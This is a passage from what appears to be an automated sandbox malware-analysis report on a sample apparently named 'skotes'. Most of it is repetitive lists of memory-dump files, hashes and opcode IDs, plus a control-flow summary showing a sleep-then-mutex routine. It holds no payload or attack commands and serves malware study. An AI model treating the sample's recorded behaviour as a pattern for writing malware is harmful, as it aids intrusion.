                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741682720.0000000000F17000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741822098.0000000001074000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741858006.0000000001076000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741903885.0000000001088000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741924804.000000000108A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741949219.000000000108B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741949219.0000000001096000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741997744.0000000001098000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742023104.000000000109D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742046018.000000000109E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742073517.00000000010A0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742101257.00000000010A9000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742129433.00000000010AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742148924.00000000010AC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742170855.00000000010B0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742194060.00000000010C5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742213925.00000000010C7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742231945.00000000010D0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742249608.00000000010D9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742270250.00000000010EE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742291913.00000000010F2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742310037.00000000010FA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742328703.00000000010FC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742345359.00000000010FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742364081.0000000001102000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742385114.0000000001103000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742403557.0000000001109000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742420325.000000000110A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742437683.000000000110D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742456555.0000000001115000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742475321.0000000001117000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742493214.0000000001118000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742511049.000000000111D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742527861.000000000111E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742545139.0000000001125000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742585813.000000000112E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742603605.000000000112F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742621245.0000000001137000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742638056.000000000113A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742675407.000000000114A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742693428.000000000114D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1743293929.000000000114E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1743372583.0000000001150000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1743425236.000000000116F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1743442942.0000000001170000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1743442942.000000000117A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1744551425.00000000011A8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1744668521.00000000011A9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1744956223.00000000011AA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1744983330.00000000011AE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1745005449.00000000011B0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1745061256.00000000011BE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1745080109.00000000011BF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_ea0000_skotes.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                                                              • Opcode ID: a86703ed3932afebce31abe226bb391ab0c7182bdee8a5ec0eb93b4fd99d77c4
                                                                                                                                                                                                                                                              • Instruction ID: 6e37514483d457d8d37d1061fe50551e0756420088ebe4d3dd8a5c964ed0b856
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a86703ed3932afebce31abe226bb391ab0c7182bdee8a5ec0eb93b4fd99d77c4
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E8210B313453009AEB28AB68DC5E77DB391DF8B704F282426E544BE2D1DB7AA581C153

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 283 eaa34f-eaa35b 284 eaa35d-eaa36b 283->284 285 eaa371-eaa39a call ebd663 283->285 284->285 286 eaa93a 284->286 291 eaa3c8-eaa916 call eb80c0 285->291 292 eaa39c-eaa3a8 285->292 288 eaa953-eaa994 Sleep CreateMutexA 286->288 289 eaa93a call ed6c6a 286->289 299 eaa996-eaa998 288->299 300 eaa9a7-eaa9a8 288->300 289->288 293 eaa3aa-eaa3b8 292->293 294 eaa3be-eaa3c5 call ebd663 292->294 293->286 293->294 294->291 299->300 303 eaa99a-eaa9a5 299->303 303->300
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 00EAA963
                                                                                                                                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00F03254), ref: 00EAA981
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.1741470474.0000000000EA1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741454272.0000000000EA0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741470474.0000000000F02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741528812.0000000000F09000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741545129.0000000000F0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741563886.0000000000F15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741652929.0000000000F16000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741682720.0000000000F17000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741822098.0000000001074000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741858006.0000000001076000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741903885.0000000001088000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741924804.000000000108A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741949219.000000000108B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741949219.0000000001096000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741997744.0000000001098000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742023104.000000000109D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742046018.000000000109E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742073517.00000000010A0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742101257.00000000010A9000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742129433.00000000010AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742148924.00000000010AC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742170855.00000000010B0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742194060.00000000010C5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742213925.00000000010C7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742231945.00000000010D0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742249608.00000000010D9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742270250.00000000010EE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742291913.00000000010F2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742310037.00000000010FA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742328703.00000000010FC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742345359.00000000010FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742364081.0000000001102000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742385114.0000000001103000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742403557.0000000001109000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742420325.000000000110A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742437683.000000000110D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742456555.0000000001115000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742475321.0000000001117000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742493214.0000000001118000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742511049.000000000111D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742527861.000000000111E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742545139.0000000001125000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742585813.000000000112E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742603605.000000000112F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742621245.0000000001137000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742638056.000000000113A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742675407.000000000114A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742693428.000000000114D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1743293929.000000000114E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1743372583.0000000001150000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1743425236.000000000116F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1743442942.0000000001170000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1743442942.000000000117A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1744551425.00000000011A8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1744668521.00000000011A9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1744956223.00000000011AA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1744983330.00000000011AE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1745005449.00000000011B0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1745061256.00000000011BE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1745080109.00000000011BF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_ea0000_skotes.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                                                              • Opcode ID: 56e93565f59fc40f04b9ee8011e738f12f419e69f33e84cae134c54d85861bba
                                                                                                                                                                                                                                                              • Instruction ID: 5d9e3ed8864be4b74b13d347315a874fd71f8eb581ad9e9dd1e7816143a2e431
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 56e93565f59fc40f04b9ee8011e738f12f419e69f33e84cae134c54d85861bba
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1C213A317043009BEB189F68EC897ADB7A5DFCA310F285229E408FB7D5D7766584C752
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.1741470474.0000000000EA1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741454272.0000000000EA0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741470474.0000000000F02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741528812.0000000000F09000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741545129.0000000000F0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741563886.0000000000F15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741652929.0000000000F16000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741682720.0000000000F17000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741822098.0000000001074000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741858006.0000000001076000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741903885.0000000001088000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741924804.000000000108A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741949219.000000000108B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741949219.0000000001096000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741997744.0000000001098000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742023104.000000000109D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742046018.000000000109E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742073517.00000000010A0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742101257.00000000010A9000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742129433.00000000010AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742148924.00000000010AC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742170855.00000000010B0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742194060.00000000010C5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742213925.00000000010C7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742231945.00000000010D0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742249608.00000000010D9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742270250.00000000010EE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742291913.00000000010F2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742310037.00000000010FA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742328703.00000000010FC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742345359.00000000010FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742364081.0000000001102000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742385114.0000000001103000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742403557.0000000001109000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742420325.000000000110A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742437683.000000000110D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742456555.0000000001115000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742475321.0000000001117000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742493214.0000000001118000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742511049.000000000111D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742527861.000000000111E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742545139.0000000001125000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742585813.000000000112E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742603605.000000000112F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742621245.0000000001137000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742638056.000000000113A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742675407.000000000114A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742693428.000000000114D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1743293929.000000000114E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1743372583.0000000001150000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1743425236.000000000116F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1743442942.0000000001170000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1743442942.000000000117A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1744551425.00000000011A8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1744668521.00000000011A9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1744956223.00000000011AA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1744983330.00000000011AE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1745005449.00000000011B0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1745061256.00000000011BE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1745080109.00000000011BF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_ea0000_skotes.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: _strrchr
                                                                                                                                                                                                                                                              • String ID: v
                                                                                                                                                                                                                                                              • API String ID: 3213747228-1361604894
                                                                                                                                                                                                                                                              • Opcode ID: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
                                                                                                                                                                                                                                                              • Instruction ID: 163fdb54c6cba91d0546af17efc3c13ad04d3eca3979e4ae30cac8b01d202eab
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EDB122729042869FDB158F68C8817BEBBE6EF45384F24916BE955FB342D6348D03CB60
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.1741470474.0000000000EA1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741454272.0000000000EA0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741470474.0000000000F02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741528812.0000000000F09000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741545129.0000000000F0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741563886.0000000000F15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741652929.0000000000F16000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741682720.0000000000F17000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741822098.0000000001074000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741858006.0000000001076000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741903885.0000000001088000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741924804.000000000108A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741949219.000000000108B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741949219.0000000001096000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741997744.0000000001098000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742023104.000000000109D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742046018.000000000109E000.00000080.00000001.01000000.00000008.sdmpDownload File
